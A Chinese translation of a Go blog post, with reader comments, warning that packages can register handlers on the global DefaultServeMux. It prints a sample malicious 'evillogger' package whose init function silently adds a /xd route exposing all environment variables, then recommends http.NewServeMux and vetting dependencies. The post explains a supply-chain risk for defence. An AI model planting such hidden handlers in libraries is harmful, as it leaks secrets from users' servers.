我看到许多文章和帖子都显示了一种方便简单的方法来这样创建 go 的 Web 服务:
package main
import (
"fmt"
"log"
"net/http"
)
func main() {
http.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request){
fmt.Fprintf(w, "pong")
})
fmt.Printf("Starting server at port 8080\n")
if err := http.ListenAndServe(":8080", nil); err != nil {
log.Fatal(err)
}
}
上边的代码里将注册路由 http.HandleFunc 和 处理函数 http.Handle 注册到默认多路复用器 DefaultServerMux。问题是 DefaultServerMux 是一个全局的并且可导出的变量。
黑客可能开发一个恶意的包(lib)或者劫持伪装一个正常的包,将破坏性的 Handle 函数注册到 DefaultServerMux,例如使用 init 函数:
package evillogger
func init(){
someBoringSetUp()
}
func someBoringSetUp(){
http.HandleFunc("/xd", commonAndBoringFunctionname)
}
func commonAndBoringFunctionname(w http.ResponseWriter, r *http.Request){
type osenv struct {
Key string
Value string
}
envs := []osenv{}
for _, element := range os.Environ() {
variable := strings.Split(element, "=")
envs = append(envs, osenv{Key: variable[0], Value: variable[1]})
}
_ = json.NewEncoder(w).Encode(map[string]interface{}{"inyected: ": &envs})
}
在大型项目中混入恶意程序并非难事,但是避免这个问题的方法也很简单,只需要新建一个多路复用器即可:
serverMux := http.NewServeMux()
在我看来,最大的收获是:没有经过任何验证,不要引入任何不可信的第三方库!
via: https://sgrodriguez.github.io/2020/08/21/defaultServerMux.html
作者:Santiago Rodriguez 译者:TomatoAres 校对:polaris1119
via: https://sgrodriguez.github.io/2020/08/21/defaultServerMux.html
作者:Santiago Rodriguez 译者:TomatoAres 校对:polaris1119
本文由 GCTT 原创翻译,Go语言中文网 首发。也想加入译者行列,为开源做一些自己的贡献么?欢迎加入 GCTT!
翻译工作和译文发表仅用于学习和交流目的,翻译工作遵照 CC-BY-NC-SA 协议规定,如果我们的工作有侵犯到您的权益,请及时联系我们。
欢迎遵照 CC-BY-NC-SA 协议规定 转载,敬请在正文中标注并保留原文/译文链接和作者/译者等信息。
文章仅代表作者的知识和看法,如有不同观点,请楼下排队吐槽
有疑问加站长微信联系(非本文作者))
能这么做到的,恐怕是内鬼吧
很多人引入第三方库的时候,很少会去研究源码。 如果第三方库里加一个小小的 破坏性的 init 函数,那就会这样了
确实